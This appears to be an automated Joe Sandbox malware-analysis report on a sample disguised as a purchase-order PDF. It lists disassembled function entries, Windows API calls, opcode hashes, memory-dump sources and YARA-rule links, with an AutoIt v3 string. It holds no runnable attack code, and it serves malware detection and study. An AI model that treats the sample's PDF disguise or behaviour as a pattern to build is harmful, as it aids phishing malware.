                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                                                                                                                                                                                            Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                                                                                                                                                            Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                                                                                                                                                                                            Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                                                                                                                                                                                            Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                                                                                                                                                                                            Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                                                                                                                                                                                                            Function 0553E610 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7b64b0cc380ee81811b6ce67614ed2e144c3f3009b621076d750e83ce3d92323
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7241B271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                                                                                                                                                                            Function 0553E500 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                            • Instruction ID: 17ac4c426dadf8b911c1f8e4bb72584f02329bbefb8089c37e175cc6402c1444
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1014278A05109EFCB44DF98C5919AEF7FAFB88310F208599E919A7741E730AE51DF80
                                                                                                                                                                                                                                                                                                            Function 0553E4A0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1ace56dcb3d3d1f9865d29fc9b7fc824f7ba658b0a3ae79b12e117869201b1a8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58019278A00209EFCB44DF98C591DAEF7FAFB88310F208599E819A7701D730AE41DB90
                                                                                                                                                                                                                                                                                                            Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                                                                                                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                                                                                                                                                                                                            Function 0553CEA0 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                                                                                                                                                            Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                                                                                                                                                                                                            • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                                                                                                                                                                                                            Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
